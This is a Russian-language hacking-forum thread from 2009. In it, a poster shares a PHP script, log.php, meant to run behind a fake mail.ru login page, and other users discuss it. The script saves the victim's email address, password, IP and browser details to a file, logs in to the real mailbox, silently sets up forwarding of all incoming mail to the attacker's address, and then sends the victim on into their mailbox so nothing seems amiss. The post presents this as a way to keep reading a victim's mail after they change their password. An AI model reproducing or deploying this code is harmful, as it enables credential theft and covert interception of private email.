Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Прячем "подарок" в ящике майла (https://forum.antichat.xyz/showthread.php?t=152732)

Kusto 31.10.2009 21:41

Прячем "подарок" в ящике майла
 
Собственно говоря навеянно темой http://forum.antichat.ru/thread130561.html
Сидим ты с товарищем zifanchuck - общаемся по аське и обалдеваем со скорости с которой товарищи с mail.ru латают дыры ну и собственно говоря чтоб они не остались без работы :D решили с ним написать простенький скрипт. Это собственно говоря часть фейка обычный файл с названием log.php
Давайте порассуждаем как нам продлить свое незаметное прибывание на ящике жертвы? И что б вы сделали в первую очередь еслиб заподозрили что на вашем почтовом ящике "завелась какаято бяка"? Ответ напрашиваеться сам собой- бежим менять пасс и контрольный вопрос на восстановлении пароля- логично? (именно поэтому эту часть мы трогать небудем)
Ну а чтож тогда остаеться в Нашем распоряжении??? Скажете- ничего? Типа жертва сменила пасс и вопрос- и мы доступ потеряли? Да так могут сказать 99% пользователей, но почемуто мы всегда без внимания оставляем маленькую деталь- а именно мы можем прописать СВОЕ мыло в ящике жертвы....(а вы когда последний раз залазили в своем ящике в пересылку писем?), Я думаю что уже почти все догадались что просто в нашем фейке- мы пропишем свое мыло на которое хотим получать всю входящую почту жертвы . Оригинальнось этого способа что при удачном стечении обстоятельств мы читаем письма жертвы а они у нее остаються в ящике непрочтенными, для этого надо лиш к своему фейку прикрутить обыкновенный файлик log.php который мы с товарищем Zifanchuk нарисовали специально для пользователей antichat.ru в котором единственное надо прописать свое мыло которое мы прячем в ящике жертвы, ну а после того как жертва авторизируеться- бежать на свой ящик и делать подтверждение на привязку своего ящика к ящику жертвы и тихо-тихо без палива читать все входящие которые получит наша жертва, а вот собственно говоря сам скрипт
PHP код:

<?php
/**
 * @author Kusto & Zifanchuck
 * @copyright 2009
 //Скрипт непретендует на оригинальность
 //Просто стараемся замаскироваться в ящике жертвы
 //был выложен на antichat.ru
 */
$Login $_POST['login']; //Логин
$Domain $_POST['domain']; 
$Pass $_POST['password']; // Пароль
$ip $_SERVER["REMOTE_ADDR"]; // IP Жертвы
$Data date("d-m-y H:i:s"time()); // Дата и время
$Browser getenv("HTTP_USER_AGENT");
$Port getenv("REMOTE_PORT");
$Connect $_SERVER['HTTP_CONNECTION'];
$Host gethostbyaddr(getenv("REMOTE_ADDR")); 
$Mymail='Наше мыло';//здесь записываем наше мыло на которое хотим получать письма с ящика жертвы в формате vasya@mail.ru
$filelog fopen("base.php","a+"); //открываем файл базы
$text "[$Data] Browser:[$Browser] Port:[$Port] Connect:[$Connect] Host:[$Host] IP:$ip Мыло:$Login@$Domain Пасс:$Pass";
fwrite($filelog,"\n $text \n"); //записываем всё
fclose($filelog); //закрываем

function curl($url,$post)
{
$cfile 'cookies.txt';
$ch curl_init();
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_URL$url);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_POSTFIELDS$post);
curl_setopt($chCURLOPT_COOKIEJAR$cfile);
curl_setopt($chCURLOPT_COOKIEFILE$cfile);
curl_setopt($chCURLOPT_POST1);
$result curl_exec($ch);
curl_close($ch);
return 
$result;
};



$result curl('http://win.mail.ru/cgi-bin/auth''Login='.$Login.'&Domain='.$Domain.'&Password='.$Pass);
$result curl('http://win.mail.ru/cgi-bin/modifyfwd''modify=1&Username='.$Login.'&Forward='.$Mymail.'&oldPswd='.$Pass);
echo 
"<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://win.mail.ru/cgi-bin/auth?&Login=$Login&Domain=$Domain&Password=$Pass'></head></html>"// кидаем пользователя в ящик
?>

P.S. Еще раз напоминаю что работа не авторская а результат бреда бвух балбесов которые мирно болтали в асе и их осенило (я имел ввиду себя и Zifanchuck)

P.S. S.Пользуясь случаем хочу передать привет работникам mail.ru и пожелать процветания их компании втечении долгих долгих лет, с Уважением Кусто

zifanchuck 31.10.2009 21:49

В теме постите результаты тестов ну и ваши предложения. ждемс)

zavra 31.10.2009 22:08

нифига не понял. просто фейк, который настроит переадресацию?

Kusto 31.10.2009 22:18

Цитата:

Сообщение от zavra
нифига не понял. просто фейк, который настроит переадресацию?

Просто фейк который сохраняет мыло пасс в base.php
так-же сохраняет куки в файл а Самое главное прячет ВАШЕ мыло в ящике жертвы впоследствии на которое вы получаете все входящие письма предназначенные для вашей жертвы (вернее копии писем)- это надо для того чтоб например у жертвы стоит высокая безопасность и вы неможете зайти на ящик либо тут-же сменила жертва и пасс и вопрос (чтоб контроль над ящиком непотерять)

zavra 31.10.2009 22:29

ну ок, идея все же не нова. и человек, ставящий такие высокие настройки безопасности, вряд ли поведется на фейк.

Kusto 31.10.2009 22:35

Цитата:

Сообщение от zavra
ну ок, идея все же не нова. и человек, ставящий такие высокие настройки безопасности, вряд ли поведется на фейк.

1.Я никогда невидел реализацию (ткните меня носом где вы это видели)
2.За мою долгую практику (как можете видеть из этой темы http://forum.antichat.ru/thread57658.html) Высокую безопасность ставят именно ламеры, а на фейк как ты выразился.... просто ты видел наверное пабликфейки и делаеш выводы о всех (я иногда сам теряюсь: фейк передо мной или нет) :D ()))

vano044 21.11.2009 02:36

А еще чего интересного засунуть в мыло изнутри, чтоб копнуть поглубже? Мыслей хороших не возникало?))))))

udman 21.11.2009 03:34

тяжеловато будет кого на фейк закинуть, это вам не вконтакте.ру где можно пару букав изменить, а в мейл измени так сразу спалят )

Kusto 21.11.2009 20:33

Цитата:

Сообщение от satana-fu
ничего что при входе в ящик под папками бывает надпись ??? :) палевно.... надпись прямо в глаза лезет

Где ты такое увидел??? 0_о я думал уже майл снова что то пофиксил- нифига- настроил пересылку на яндекс- все чисто- никаких записей по поводу пересылки.....

Kernet 22.11.2009 12:02

Один кернет нихера не понял :D
Вот я закатал скрипт на локалхост,закатал туда-же base.php, дальше я так понимаю нужен фейк мылару?)


Время: 03:28